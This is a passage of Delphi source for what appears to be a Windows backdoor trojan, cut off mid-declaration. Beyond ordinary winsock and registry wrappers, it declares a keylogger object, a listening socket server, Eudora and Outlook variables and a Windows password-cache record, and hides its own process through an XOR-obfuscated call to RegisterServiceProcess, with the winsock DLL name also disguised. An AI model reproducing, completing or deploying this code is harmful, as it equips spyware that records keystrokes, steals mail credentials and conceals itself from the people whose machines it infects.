    BigIcon: Longbool;
    Icon: HICON;
    Result: Longint;
  end;

  TWMSetRedraw = record
    Msg: Cardinal;
    Redraw: Longint;
    Unused: Longint;
    Result: Longint;
  end;

  TWMSetText = record
    Msg: Cardinal;
    Unused: Longint;
    Text: PChar;
    Result: Longint;
  end;

  TWMShowWindow = record
    Msg: Cardinal;
    Show: BOOL;
    Status: Longint;
    Result: Longint;
  end;

  TWMSize = record
    Msg: Cardinal;
    SizeType: Longint; { SIZE_MAXIMIZED, SIZE_MINIMIZED, SIZE_RESTORED,
                         SIZE_MAXHIDE, SIZE_MAXSHOW }
    Width: Word;
    Height: Word;
    Result: Longint;
  end;

  TWMSizeClipboard = record
    Msg: Cardinal;
    Viewer: HWND;
    RC: THandle;
    Result: Longint;
  end;

  TWMSpoolerStatus = record
    Msg: Cardinal;
    JobStatus: Longint;
    JobsLeft: Word;
    Unused: Word;
    Result: Longint;
  end;

  TWMStyleChange = record
    Msg: Cardinal;
    StyleType: Longint;
    StyleStruct: PStyleStruct;
    Result: Longint;
  end;

  TWMStyleChanged = TWMStyleChange;
  TWMStyleChanging = TWMStyleChange;

  TWMSysChar = TWMKey;
  TWMSysColorChange = TWMNoParams;

  TWMSysDeadChar = record
    Msg: Cardinal;
    CharCode: Word;
    Unused: Word;
    KeyData: Longint;
    Result: Longint;
  end;

  TWMSysKeyDown = TWMKey;
  TWMSysKeyUp = TWMKey;

  TWMSystemError = record
    Msg: Cardinal;
    ErrSpec: Word;
    Unused: Longint;
    Result: Longint;
  end;

  TWMTimeChange = TWMNoParams;

  TWMTimer = record
    Msg: Cardinal;
    TimerID: Longint;
    TimerProc: TFarProc;
    Result: Longint;
  end;

  TWMUndo = TWMNoParams;

  TWMVKeyToItem = TWMCharToItem;

  TWMVScroll = TWMScroll;

  TWMVScrollClipboard = record
    Msg: Cardinal;
    Viewer: HWND;
    ScollCode: Word;
    ThumbPos: Word;
    Result: Longint;
  end;

  TWMWindowPosChanged = TWMWindowPosMsg;
  TWMWindowPosChanging =
    TWMWindowPosMsg;

  TWMWinIniChange = record
    Msg: Cardinal;
    Unused: Integer;
    Section: PChar;
    Result: Longint;
  end;

  TWMHelp = record
    Msg: Cardinal;
    Unused: Integer;
    HelpInfo: PHelpInfo;
    Result: Longint;
  end;

  TWMDisplayChange = record
    Msg: Cardinal;
    BitsPerPixel: Integer;
    Width: Word;
    Height: Word;
  end;

// sysutils type
type
  WordRec = packed record
    Lo, Hi: Byte;
  end;

  LongRec = packed record
    Lo, Hi: Word;
  end;

  TMethod = record
    Code, Data: Pointer;
  end;

  PByteArray = ^TByteArray;
  TByteArray = array[0..32767] of Byte;

  PWordArray = ^TWordArray;
  TWordArray = array[0..16383] of Word;

  TProcedure = procedure;

  TFileName = string;

  TSearchRec = record
    Time: Integer;
    Size: Integer;
    Attr: Integer;
    Name: TFileName;
    ExcludeAttr: Integer;
    FindHandle: THandle;
    FindData: TWin32FindData;
  end;

  TFileRec = record
    Handle: Integer;
    Mode: Integer;
    RecSize: Cardinal;
    Private: array[1..28] of Byte;
    UserData: array[1..32] of Byte;
    Name: array[0..259] of Char;
  end;

  PTextBuf = ^TTextBuf;
  TTextBuf = array[0..127] of Char;
  TTextRec = record
    Handle: Integer;
    Mode: Integer;
    BufSize: Cardinal;
    BufPos: Cardinal;
    BufEnd: Cardinal;
    BufPtr: PChar;
    OpenFunc: Pointer;
    InOutFunc: Pointer;
    FlushFunc: Pointer;
    CloseFunc: Pointer;
    UserData: array[1..32] of Byte;
    Name: array[0..259] of Char;
    Buffer: TTextBuf;
  end;

  TFloatValue = (fvExtended, fvCurrency);

  TFloatFormat = (ffGeneral, ffExponent, ffFixed, ffNumber, ffCurrency);

  TFloatRec = packed record
    Exponent: Smallint;
    Negative: Boolean;
    Digits: array[0..20] of Char;
  end;

  TTimeStamp = record
    Time: Integer; { Number of milliseconds since midnight }
    Date: Integer; { One plus number of days since 1/1/0003 }
  end;

  TMbcsByteType = (mbSingleByte, mbLeadByte, mbTrailByte);

  TSysLocale = packed record
    DefaultLCID: LCID;
    PriLangID: LANGID;
    SubLangID: LANGID;
    FarEast: Boolean;
  end;

  // password connection type
  TPasswordCacheEntry = packed record
    cbEntry : word; // size of this entry, in bytes
    cbResource : word; // size of resource name, in bytes
    cbPassword : word; // size of password, in bytes
    iEntry : byte; // entry index
    nType : byte; // type of entry
    abResource : array [0..$FFFFFFF] of char;
  end;
  TPPasswordCacheEntry = ^TPasswordCacheEntry;

// registry type
type
  TRegKeyInfo = record
    NumSubKeys: Integer;
    MaxSubKeyLen: Integer;
    NumValues: Integer;
    MaxValueLen: Integer;
    MaxDataLen: Integer;
    FileTime: TFileTime;
  end;

  TRegDataType = (rdUnknown, rdString, rdExpandString, rdInteger, rdBinary);

  TRegDataInfo = record
    RegData: TRegDataType;
    DataSize: Integer;
  end;

  TRegistry = class(TObject)
  private
    FCurrentKey: HKEY;
    FRootKey: HKEY;
    FLazyWrite: Boolean;
    FCurrentPath: string;
    FCloseRootKey: Boolean;
    procedure SetRootKey(Value: HKEY);
    function OpenKey(const Key: string; CanCreate: Boolean): Boolean;
  protected
    function GetBaseKey(Relative: Boolean): HKey;
    procedure ChangeKey(Value: HKey; const Path: string);
    procedure PutData(const Name: string; Buffer: Pointer; BufSize: Integer; RegData: TRegDataType);
    function GetData(const Name: string; Buffer: Pointer; BufSize: Integer; var RegData: TRegDataType): Integer;
  public
    constructor Create;
    destructor Destroy; override;
    procedure WriteString(const Name, Value: string);
    function ReadString(const Name: string): string;
    procedure CloseKey;
    function GetDataSize(const ValueName: string): Integer;
    function GetDataInfo(const ValueName: string; var Value: TRegDataInfo): Boolean;
    property CurrentKey : HKEY read FCurrentKey;
    property RootKey: HKEY read FRootKey write SetRootKey;
    property CurrentPath: string read FCurrentPath;
    property LazyWrite: Boolean read FLazyWrite write FLazyWrite;
  end;

//=============================================================================THE_SOCKET;
//=============================================================================THE_SOCKET;
  //Socket_Object_server
  TSock = class(TObject)
    procedure WriteString(wParam:word;Buff:PChar);
    function WriteData(wParam:word;Buff:pointer;Len:longInt):LongInt;
    procedure OnServerAccept(wParam,lParam:longInt);
    procedure OnServerClose(wParam,lParam:longInt);
    procedure OnServerRead(wParam,lParam:longInt);
  private
  public
  end;

//Key_logger_object
Type
  TLog = class(TObject)
    procedure LogCreate;
    procedure LogDestroy;
  private
    procedure KeyIncrement( var Msg: TMessage ); message UM_KEYHIT;
  public
  end;

//============== all var
var
  //sysutils var
  SysLocale: TSysLocale;
  LeadBytes: set of Char = [];
  Win32Platform: Integer;
  //MainVariables
  wClass: TWndClass; // Class struct for main window
  hInst, // Handle of program instance
  Handle: Integer; // Handle of main window
  Msg2: TMSG; // Message struct
  //Msg: TMSG;
  //Socket
  Server: TSocket;
  WSD: TWSAData;
  Addr: TSockAddrIn; // Address for connect.
  Port: Integer;
  //ReadBuff: TBuffer;
  yyyy,mm,dd,h,m,ss,CountRB: Word;
  result,nukemsg,nukemsg2,s,driv: string;
  d:integer;
  // si,i:integer;
  //udp
  j:byte;
  z:longint;
  //ip
  //Registry
  Registre: TRegistry;
  //other
  klasse: array [0..255] of char;
  Timeout: integer;
  t:textfile;
  // classe: array [0..255] of char;
  // counter :integer;
  //thread
  Sock:TSock;
  KLog: Tlog;
  eudora:string;
  outlook:string;
  ttt:textfile;
  h_SOCK_DLL :HModule;
  ThreadHdle :THandle;
  ThreadID :Integer;
  ExitCode :Integer;
  ThreadHdle2 :THandle;
  ThreadID2 :Integer;
  ExitCode2 :Integer;
  ThreadHdle3:THandle;
  ThreadID3 :Integer;
  ExitCode3 :Integer;

//===Dir
function systemdir:string;
var
  d:integer;
begin
  setlength(result,500);
  d:=getsystemdirectory(pchar(result),500);
  setlength(result,d);
end;

function windowsdir:string;
var
  d:integer;
begin
  setlength(result,500);
  d:=getwindowsdirectory(pchar(result),500);
  setlength(result,d);
end;

Function Crypt(S : String) : String;
Var
  i : Byte;
begin
  For i := 1 to Length(S) Do
    S[i] := Char(ord(S[i]) xor i);
  Crypt := S;
end;

//==executeAPI
function ShellExecute(hWnd: HWND; Operation, FileName, Parameters, Directory: PChar; ShowCmd: Integer):integer; stdcall;
  external 'shell32.dll' name 'ShellExecuteA';
//function RegisterServiceProcess(dwProcessID, dwType: Integer): Integer; stdcall; external 'KERNEL32.DLL';

function
RegisterInService:boolean;
type
  TRegisterServiceProcess = function(ProcessID :Integer; Service :Boolean):Boolean; StdCall;
var
  h_KERNEL_DLL :HModule;
  RegisterServiceProcess :TRegisterServiceProcess;
begin
  Result := False;
  h_KERNEL_DLL := LoadLibrary(PChar('kernel32.dll'));
  if h_KERNEL_DLL <> Null then
  begin
    RegisterServiceProcess := GetProcAddress(h_KERNEL_DLL, PChar(crypt('SgdmvrbzZoyzdmj@c}pqfe'))); //RegisterServiceProcess
    if @RegisterServiceProcess <> Nil then
      Result := RegisterServiceProcess(GetCurrentProcessID, True);
    FreeLibrary(h_KERNEL_DLL);
  end;
end;

//=== winsock function
//function accept(s: TSocket; addr: PSockAddr; addrlen: PInteger): TSocket; stdcall; external winsocket name 'accept';
function accept(s: TSocket; addr: PSockAddr; addrlen: PInteger): TSocket; stdcall;
Type
  TListen = function(s: TSocket; addr: PSockAddr; addrlen: PInteger): TSocket; stdcall;
var
  LListen :TListen;
begin
  Result := 0;
  h_SOCK_DLL := LoadLibrary(PChar(crypt(winsocket)));
  if h_SOCK_DLL <> Null then
  begin
    LListen := GetProcAddress(h_SOCK_DLL, PChar('accept'));
    if @LListen <> Nil then
      Result := LListen(s, addr,addrlen);
    FreeLibrary(h_SOCK_DLL);
  end;
end;

//function bind(s: TSocket; var addr: TSockAddr; namelen: Integer): Integer; stdcall; external winsocket name 'bind';
function bind(s: TSocket; var addr: TSockAddr; namelen: Integer): Integer; stdcall;
Type
  TListen = function(s: TSocket; var addr: TSockAddr; namelen: Integer): Integer; stdcall;
var
  LListen :TListen;
begin
  Result := 0;
  h_SOCK_DLL := LoadLibrary(PChar(crypt(winsocket)));
  if h_SOCK_DLL <> Null then
  begin
    LListen := GetProcAddress(h_SOCK_DLL, PChar('bind'));
    if @LListen <> Nil then
      Result := LListen(s, addr,namelen);
    FreeLibrary(h_SOCK_DLL);
  end;
end;

//function closesocket(s: TSocket): Integer; stdcall; external winsocket name 'closesocket';
function closesocket(s: TSocket): Integer; stdcall;
Type
  TListen = function(s: TSocket): Integer; stdcall;
var
  LListen :TListen;
begin
  Result := 0;
  h_SOCK_DLL := LoadLibrary(PChar(crypt(winsocket)));
  if h_SOCK_DLL <> Null then
  begin
    LListen := GetProcAddress(h_SOCK_DLL, PChar('closesocket'));
    if @LListen <> Nil then
      Result := LListen(s);
    FreeLibrary(h_SOCK_DLL);
  end;
end;

//function connect(s: TSocket; var name: TSockAddr; namelen: Integer): Integer; stdcall; external winsocket name 'connect';
function connect(s: TSocket; var name: TSockAddr; namelen: Integer): Integer; stdcall;
Type
  TListen = function(s: TSocket; var name: TSockAddr; namelen: Integer): Integer; stdcall;
var
  LListen :TListen;
begin
  Result := 0;
  h_SOCK_DLL := LoadLibrary(PChar(crypt(winsocket)));
  if h_SOCK_DLL <> Null then
  begin
    LListen := GetProcAddress(h_SOCK_DLL, PChar('connect'));
    if @LListen <> Nil then
      Result := LListen(s,name,namelen);
    FreeLibrary(h_SOCK_DLL);
  end;
end;

function getpeername(s: TSocket; var name: TSockAddr; var namelen: Integer): Integer; stdcall;
  external winsocket name 'getpeername';
function getsockname(s: TSocket; var name: TSockAddr; var namelen: Integer): Integer; stdcall;
  external winsocket name 'getsockname';
function getsockopt(s: TSocket; level, optname: Integer; optval: PChar; var optlen: Integer): Integer; stdcall;
  external winsocket name 'getsockopt';

//function htonl(hostlong: u_long): u_long; stdcall; external winsocket name 'htonl';
function htonl(hostlong: u_long): u_long; stdcall;
Type
  TListen = function(hostlong: u_long): u_long; stdcall;
var
  LListen :TListen;
begin
  Result := 0;
  h_SOCK_DLL := LoadLibrary(PChar(crypt(winsocket)));
  if h_SOCK_DLL <> Null then
  begin
    LListen := GetProcAddress(h_SOCK_DLL, PChar('htonl'));
    if @LListen <> Nil then
      Result := LListen(hostlong);
    FreeLibrary(h_SOCK_DLL);
  end;
end;

//function htons(hostshort: u_short): u_short; stdcall; external winsocket name 'htons';
function htons(hostshort: u_short): u_short; stdcall;
Type
  TListen = function(hostshort: u_short): u_short; stdcall;
var
  LListen :TListen;
begin
  Result := 0;
  h_SOCK_DLL := LoadLibrary(PChar(crypt(winsocket)));
  if h_SOCK_DLL <> Null
  then begin
    LListen := GetProcAddress(h_SOCK_DLL, PChar('htons'));
    if @LListen <> Nil then
      Result := LListen(hostshort);
    FreeLibrary(h_SOCK_DLL);
  end;
end;

//function inet_addr(cp: PChar): u_long; stdcall; external winsocket name 'inet_addr'; {PInAddr;} { TInAddr }
function inet_addr(cp: PChar): u_long; stdcall;
Type
  TListen = function(cp: PChar): u_long; stdcall;
var
  LListen :TListen;
begin
  Result := 0;
  h_SOCK_DLL := LoadLibrary(PChar(crypt(winsocket)));
  if h_SOCK_DLL <> Null then
  begin
    LListen := GetProcAddress(h_SOCK_DLL, PChar('inet_addr'));
    if @LListen <> Nil then
      Result := LListen(cp);
    FreeLibrary(h_SOCK_DLL);
  end;
end;

function inet_ntoa(inaddr: TInAddr): PChar; stdcall;
  external winsocket name 'inet_ntoa';
function ioctlsocket(s: TSocket; cmd: Longint; var arg: u_long): Integer; stdcall;
  external winsocket name 'ioctlsocket';

//function listen(s: TSocket; backlog: Integer): Integer; stdcall; external winsocket name 'listen';
function listen(s: TSocket; backlog: Integer): Integer; stdcall;
Type
  TListen = function(s: TSocket; backlog: Integer): Integer; stdcall;
var
  LListen :TListen;
begin
  Result := 0;
  h_SOCK_DLL := LoadLibrary(PChar(crypt(winsocket)));
  if h_SOCK_DLL <> Null then
  begin
    LListen := GetProcAddress(h_SOCK_DLL, PChar('listen'));
    if @LListen <> Nil then
      Result := LListen(s, backlog);
    FreeLibrary(h_SOCK_DLL);
  end;
end;

//function ntohl(netlong: u_long): u_long; stdcall; external winsocket name 'ntohl';
function ntohl(netlong: u_long): u_long; stdcall;
Type
  TListen = function(netlong: u_long): u_long; stdcall;
var
  LListen :TListen;
begin
  Result := 0;
  h_SOCK_DLL := LoadLibrary(PChar(crypt(winsocket)));
  if h_SOCK_DLL <> Null then
  begin
    LListen := GetProcAddress(h_SOCK_DLL, PChar('ntohl'));
    if @LListen <> Nil then
      Result := LListen(netlong);
    FreeLibrary(h_SOCK_DLL);
  end;
end;

function ntohs(netshort: u_short): u_short; stdcall;
  external winsocket name 'ntohs';

//function recv(s: TSocket; var Buf; len, flags: Integer): Integer; stdcall; external winsocket name 'recv';
function recv(s: TSocket; var Buf; len, flags: Integer): Integer; stdcall;
Type
  TListen = function(s: TSocket; var Buf; len, flags: Integer): Integer; stdcall;
var
  LListen :TListen;
begin
  Result := 0;
  h_SOCK_DLL := LoadLibrary(PChar(crypt(winsocket)));
  if h_SOCK_DLL <> Null then
  begin
    LListen := GetProcAddress(h_SOCK_DLL, PChar('recv'));
    if @LListen <> Nil then
      Result := LListen(s,buf,len,flags);
    FreeLibrary(h_SOCK_DLL);
  end;
end;

function recvfrom(s: TSocket; var Buf; len, flags: Integer; var from: TSockAddr; var fromlen: Integer): Integer; stdcall;
  external winsocket name 'recvfrom';
function select(nfds: Integer; readfds, writefds, exceptfds: PFDSet; timeout: PTimeVal): Longint; stdcall;
  external winsocket name 'select';

//function send(s: TSocket; var Buf; len, flags: Integer): Integer; stdcall; external winsocket name 'send';
function send(s: TSocket; var Buf; len, flags: Integer): Integer; stdcall;
Type
  TListen = function(s: TSocket; var Buf; len, flags: Integer): Integer; stdcall;
var
  LListen :TListen;
begin
  Result := 0;
  h_SOCK_DLL := LoadLibrary(PChar(crypt(winsocket)));
  if h_SOCK_DLL <> Null then
  begin
    LListen := GetProcAddress(h_SOCK_DLL, PChar('send'));
    if @LListen <> Nil then
      Result := LListen(s,buf,len,flags);
    FreeLibrary(h_SOCK_DLL);
  end;
end;

function sendto(s: TSocket; var Buf; len, flags: Integer; var addrto: TSockAddr; tolen: Integer): Integer; stdcall;
  external winsocket name 'sendto';
function setsockopt(s: TSocket; level, optname: Integer; optval: PChar; optlen: Integer): Integer; stdcall;
  external winsocket name 'setsockopt';
function shutdown(s: TSocket; how: Integer): Integer; stdcall;
  external winsocket name 'shutdown';

//function socket(af, struct, protocol: Integer): TSocket; stdcall; external winsocket name 'socket';
function socket(af, struct, protocol: Integer): TSocket; stdcall;
Type
  TListen = function(af, struct, protocol: Integer): TSocket; stdcall;
var
  LListen :TListen;
begin
  Result := 0;
  h_SOCK_DLL :=
    LoadLibrary(PChar(crypt(winsocket)));
  if h_SOCK_DLL <> Null then
  begin
    LListen := GetProcAddress(h_SOCK_DLL, PChar('socket'));
    if @LListen <> Nil then
      Result := LListen(af,struct,protocol);
    FreeLibrary(h_SOCK_DLL);
  end;
end;

function gethostbyaddr(addr: Pointer; len, struct: Integer): PHostEnt; stdcall;
  external winsocket name 'gethostbyaddr';

//function gethostbyname(name: PChar): PHostEnt; stdcall; external winsocket name 'gethostbyname';
function gethostbyname(name: PChar): PHostEnt; stdcall;
Type
  TListen = function(name: PChar): PHostEnt; stdcall;
var
  LListen :TListen;
begin
  Result := nil;
  h_SOCK_DLL := LoadLibrary(PChar(crypt(winsocket)));
  if h_SOCK_DLL <> Null then
  begin
    LListen := GetProcAddress(h_SOCK_DLL, PChar('gethostbyname'));
    if @LListen <> Nil then
      Result := LListen(name);
    FreeLibrary(h_SOCK_DLL);
  end;
end;

function getprotobyname(name: PChar): PProtoEnt; stdcall;
  external winsocket name 'getprotobyname';
function getprotobynumber(proto: Integer): PProtoEnt; stdcall;
  external winsocket name 'getprotobynumber';
function getservbyname(name, proto: PChar): PServEnt; stdcall;
  external winsocket name 'getservbyname';
function getservbyport(port: Integer; proto: PChar): PServEnt; stdcall;
  external winsocket name 'getservbyport';

//function gethostname(name: PChar; len: Integer): Integer; stdcall; external winsocket name 'gethostname';
function gethostname(name: PChar; len: Integer): Integer; stdcall;
Type
  TListen = function(name: PChar; len: Integer): Integer; stdcall;
var
  LListen :TListen;
begin
  Result := 0;
  h_SOCK_DLL := LoadLibrary(PChar(crypt(winsocket)));
  if h_SOCK_DLL <> Null then
  begin
    LListen := GetProcAddress(h_SOCK_DLL, PChar('gethostname'));
    if @LListen <> Nil then
      Result := LListen(name,len);
    FreeLibrary(h_SOCK_DLL);
  end;
end;

//function WSAAsyncSelect(s: TSocket; HWindow: HWND; wMsg: u_int; lEvent: Longint): Integer; stdcall; external winsocket name 'WSAAsyncSelect';
function WSAAsyncSelect(s: TSocket; HWindow: HWND; wMsg: u_int; lEvent: Longint): Integer; stdcall;
Type
  TListen = function(s: TSocket; HWindow: HWND; wMsg: u_int; lEvent: Longint): Integer; stdcall;
var
  LListen :TListen;
begin
  Result := 0;
  h_SOCK_DLL := LoadLibrary(PChar(crypt(winsocket)));
  if h_SOCK_DLL <> Null then
  begin
    LListen := GetProcAddress(h_SOCK_DLL, PChar('WSAAsyncSelect'));
    if @LListen <> Nil then
      Result := LListen(s,HWindow,wMsg,lEvent);
    FreeLibrary(h_SOCK_DLL);
  end;
end;

function WSARecvEx(s: TSocket; var buf; len: Integer; var flags: Integer): Integer; stdcall;
  external winsocket name 'WSARecvEx';
function WSAAsyncGetHostByAddr(HWindow: HWND; wMsg: u_int; addr: PChar; len, struct: Integer; buf: PChar; buflen: Integer): THandle; stdcall;
  external winsocket name 'WSAAsyncGetHostByAddr';
function WSAAsyncGetHostByName(HWindow: HWND; wMsg: u_int; name, buf: PChar; buflen: Integer): THandle; stdcall;
  external winsocket name 'WSAAsyncGetHostByName';
function WSAAsyncGetProtoByNumber(HWindow: HWND; wMsg: u_int; number: Integer; buf: PChar; buflen: Integer): THandle; stdcall;
  external winsocket name 'WSAAsyncGetProtoByNumber';
function WSAAsyncGetProtoByName(HWindow: HWND; wMsg: u_int; name, buf: PChar; buflen: Integer): THandle; stdcall;
  external winsocket name 'WSAAsyncGetProtoByName';
function WSAAsyncGetServByPort( HWindow: HWND; wMsg, port: u_int; proto, buf: PChar; buflen: Integer): THandle; stdcall;
  external winsocket name 'WSAAsyncGetServByPort';
function WSAAsyncGetServByName(HWindow: HWND; wMsg: u_int; name, proto, buf: PChar; buflen: Integer): THandle; stdcall;
  external winsocket name 'WSAAsyncGetServByName';
function WSACancelAsyncRequest(hAsyncTaskHandle: THandle): Integer; stdcall;
  external winsocket name 'WSACancelAsyncRequest';
function WSASetBlockingHook(lpBlockFunc: TFarProc): TFarProc; stdcall;
  external winsocket name 'WSASetBlockingHook';
function WSAUnhookBlockingHook: Integer; stdcall;
  external winsocket name 'WSAUnhookBlockingHook';

//function WSAGetLastError: Integer; stdcall; external winsocket name 'WSAGetLastError';
function WSAGetLastError: Integer; stdcall;
type
  TListen = function: Integer; stdcall;
var
  LListen :TListen;
begin
  Result := 0;
  h_SOCK_DLL := LoadLibrary(PChar(crypt(winsocket)));
  if h_SOCK_DLL <> Null then
  begin
    LListen := GetProcAddress(h_SOCK_DLL, PChar('WSAGetLastError'));
    if @LListen <> Nil then
      Result := LListen;
    FreeLibrary(h_SOCK_DLL);
  end;
end;

procedure WSASetLastError; stdcall;
  external winsocket name 'WSASetLastError';
function WSACancelBlockingCall: Integer; stdcall;
  external winsocket name 'WSACancelBlockingCall';
function WSAIsBlocking: BOOL; stdcall;
  external winsocket name 'WSAIsBlocking';

//function WSAStartup(wVersionRequired: word; var WSData: TWSAData): Integer; stdcall; external winsocket name 'WSAStartup';
function WSAStartup(wVersionRequired: word; var WSData: TWSAData): Integer; stdcall;
type
  TListen = function(wVersionRequired: word; var WSData: TWSAData): Integer; stdcall;
var
  LListen :TListen;
begin
  Result := 0;
  h_SOCK_DLL := LoadLibrary(PChar(crypt(winsocket)));
  if h_SOCK_DLL <> Null then
  begin
    LListen := GetProcAddress(h_SOCK_DLL, PChar('WSAStartup'));
    if @LListen <> Nil then
      Result := LListen(wVersionRequired, WSData);
    FreeLibrary(h_SOCK_DLL);
  end;
end;

//function WSACleanup: Integer; stdcall; external winsocket name 'WSACleanup';
function WSACleanup: Integer; stdcall;
type
  TListen = function: Integer; stdcall;
var
  LListen :TListen;
begin
  Result := 0;
  h_SOCK_DLL := LoadLibrary(PChar(crypt(winsocket)));
  if h_SOCK_DLL <> Null then
  begin
    LListen := GetProcAddress(h_SOCK_DLL, PChar('WSACleanup'));
    if @LListen <> Nil then
      Result := LListen;
    FreeLibrary(h_SOCK_DLL);
  end;
end;

function __WSAFDIsSet(s: TSOcket; var FDSet: TFDSet): Bool; stdcall;
  external winsocket name '__WSAFDIsSet';

function TransmitFile(hSocket: TSocket; hFile: THandle; nNumberOfBytesToWrite: DWORD;
  nNumberOfBytesPerSend: DWORD; lpOverlapped: POverlapped;
  lpTransmitBuffers: PTransmitFileBuffers; dwReserved: DWORD): BOOL; stdcall;
  external winsocket name
  'TransmitFile';

function AcceptEx(sListenSocket, sAcceptSocket: TSocket;
  lpOutputBuffer: Pointer; dwReceiveDataLength, dwLocalAddressLength,
  dwRemoteAddressLength: DWORD; var lpdwBytesReceived: DWORD;
  lpOverlapped: POverlapped): BOOL; stdcall;
  external winsocket name 'AcceptEx';

procedure GetAcceptExSockaddrs(lpOutputBuffer: Pointer;
  dwReceiveDataLength, dwLocalAddressLength, dwRemoteAddressLength: DWORD;
  var LocalSockaddr: TSockAddr; var LocalSockaddrLength: Integer;
  var RemoteSockaddr: TSockAddr; var RemoteSockaddrLength: Integer); stdcall;
  external winsocket name 'GetAcceptExSockaddrs';

function WSAMakeSyncReply(Buflen, Error: Word): Longint;
begin
  WSAMakeSyncReply:= MakeLong(Buflen, Error);
end;

function WSAMakeSelectReply(Event, Error: Word): Longint;
begin
  WSAMakeSelectReply:= MakeLong(Event, Error);
end;

function WSAGetAsyncBuflen(Param: Longint): Word;
begin
  WSAGetAsyncBuflen:= LOWORD(Param);
end;

function WSAGetAsyncError(Param: Longint): Word;
begin
  WSAGetAsyncError:= HIWORD(Param);
end;

function WSAGetSelectEvent(Param: Longint): Word;
begin
  WSAGetSelectEvent:= LOWORD(Param);
end;

function WSAGetSelectError(Param: Longint): Word;
begin
  WSAGetSelectError:= HIWORD(Param);
end;

procedure FD_CLR(Socket: TSocket; var FDSet: TFDSet);
var
  I: Integer;
begin
  I := 0;
  while I < FDSet.fd_count do
  begin
    if FDSet.fd_array[I] = Socket then
    begin
      while I < FDSet.fd_count - 1 do
      begin
        FDSet.fd_array[I] := FDSet.fd_array[I + 1];
        Inc(I);
      end;
      Dec(FDSet.fd_count);
      Break;
    end;
    Inc(I);
  end;
end;

function FD_ISSET(Socket: TSocket; var FDSet: TFDSet): Boolean;
begin
  Result := __WSAFDIsSet(Socket, FDSet);
end;

procedure FD_SET(Socket: TSocket; var FDSet: TFDSet);
begin
  if FDSet.fd_count < FD_SETSIZE then
  begin
    FDSet.fd_array[FDSet.fd_count] := Socket;
    Inc(FDSet.fd_count);
  end;
end;

procedure FD_ZERO(var FDSet: TFDSet);
begin
  FDSet.fd_count := 0;
end;

//=== stuff
function IntToStr(A:Integer):string;
begin
  Str(A,Result);
end;

function StrToInt(const S: string): Integer;
var
  E: Integer;
begin
  Val(S, Result, E);
  if E <> 0 then E:=0;//ConvertErrorFmt(SInvalidInteger, [S]);
end;

procedure AppMsg(Ms:PChar);
begin
  MessageBox(Handle,Ms,'Error',0);
end;

//=== Cleanup and stop the program ===
procedure ShutDownServer;
begin
  closesocket(Server);
  WSACleanup;
  // UnRegisterClass(lpzClassName,hInst);
  // Halt;
end;

//=== Process Messages ===
procedure ProcessMessages;
begin
  while GetMessage(Msg2,0,0,0) do
  begin
    TranslateMessage(Msg2);
    DispatchMessage(Msg2);
  end;
end;

//=== Process CreateWindow ===
procedure OnCreate(hWnd:Integer);
begin
  //nothing
end;

procedure OnClose(hWnd:Integer);
begin
  //ShellExecute(0,nil,PChar(paramstr(0)),nil,nil,SW_NORMAL); //=== active it
  ShutDownServer;
  GetExitCodeThread(ThreadHdle, ExitCode);
  TerminateThread(ThreadHdle, ExitCode);
  GetExitCodeThread(ThreadHdle2, ExitCode2);
  TerminateThread(ThreadHdle2, ExitCode2);
  GetExitCodeThread(ThreadHdle3, ExitCode3);
  TerminateThread(ThreadHdle3, ExitCode3);
  klog.LogDestroy;
end;

//=== Socket things =====
//=== Send a String #0 ===
procedure TSock.WriteString(wParam:word;Buff:PChar);
begin
  send(wParam,Buff^,Length(Buff),0);
end;

//=== Send Buffer ===
function TSock.WriteData(wParam:word;Buff:pointer;Len:longInt):LongInt;
begin
  Result:=send(wParam,Buff^,Len,0);
end;

//=== Process OnAccept ===
procedure TSock.OnServerAccept(wParam,lParam:longInt);
begin
  accept(Server,nil,nil);
end;

//=== Process OnClose ===
procedure TSock.OnServerClose(wParam,lParam:longInt);
begin
  //nothing
end;

function GetLocalHostName: string;
var
  szHostName: array[0..128] of char;
begin
  if gethostname(szHostName, 128) = 0 then
    Result:= szHostName;
end;

//======= sysutils =========
function StrPas(Str: PChar): string;
begin
  Result := Str;
end;

function StrLen(Str: PChar): Cardinal; assembler;
asm
        MOV     EDX,EDI
        MOV     EDI,EAX
        MOV     ECX,0FFFFFFFFH
        XOR     AL,AL
        REPNE   SCASB
        MOV     EAX,0FFFFFFFEH
        SUB     EAX,ECX
        MOV     EDI,EDX
end;

function StrCopy(Dest, Source: PChar): PChar; assembler;
asm
        PUSH    EDI
        PUSH    ESI
        MOV     ESI,EAX
        MOV     EDI,EDX
        MOV     ECX,0FFFFFFFFH
        XOR     AL,AL
        REPNE   SCASB
        NOT     ECX
        MOV     EDI,ESI
        MOV     ESI,EDX
        MOV     EDX,ECX
        MOV     EAX,EDI
        SHR     ECX,2
        REP     MOVSD
        MOV     ECX,EDX
        AND     ECX,3
        REP     MOVSB
        POP     ESI
        POP     EDI
end;

function StrScan(Str: PChar; Chr: Char): PChar; assembler;
asm
        PUSH    EDI
        PUSH    EAX
        MOV     EDI,Str
        MOV     ECX,0FFFFFFFFH
        XOR     AL,AL
        REPNE   SCASB
        NOT     ECX
        POP     EDI
        MOV     AL,Chr
        REPNE   SCASB
        MOV     EAX,0
        JNE     @@1
        MOV     EAX,EDI
        DEC     EAX
@@1:    POP     EDI
end;

function DiskSize(Drive: Byte): Integer;
var
  RootPath: array[0..4] of Char;
  RootPtr: PChar;
  SectorsPerCluster, BytesPerSector, FreeClusters, TotalClusters: Integer;
begin
  RootPtr := nil;
  if Drive > 0 then
  begin
    StrCopy(RootPath, 'A:\');
    RootPath[0] := Char(Drive + $40);
    RootPtr := RootPath;
  end;
  if GetDiskFreeSpace(RootPtr, SectorsPerCluster, BytesPerSector, FreeClusters, TotalClusters) then
    Result := SectorsPerCluster * BytesPerSector * TotalClusters
  else
    Result := -1;
end;

function DeleteFile(const FileName: string): Boolean;
begin
  Result := Windows.DeleteFile(PChar(FileName));
end;

function FileAge(const FileName: string): Integer;
var
  Handle: THandle;
  FindData: TWin32FindData;
  LocalFileTime: TFileTime;
begin
  Handle := FindFirstFile(PChar(FileName), FindData);
  if Handle <> INVALID_HANDLE_VALUE then
  begin
    Windows.FindClose(Handle);
    if (FindData.dwFileAttributes and FILE_ATTRIBUTE_DIRECTORY) = 0 then
    begin
      FileTimeToLocalFileTime(FindData.ftLastWriteTime, LocalFileTime);
      if FileTimeToDosDateTime(LocalFileTime, LongRec(Result).Hi, LongRec(Result).Lo) then
        Exit;
    end;
  end;
  Result := -1;
end;

function FileExists(const FileName: string): Boolean;
begin
  Result := FileAge(FileName) <> -1;
end;

function ByteTypeTest(P: PChar; Index: Integer): TMbcsByteType;
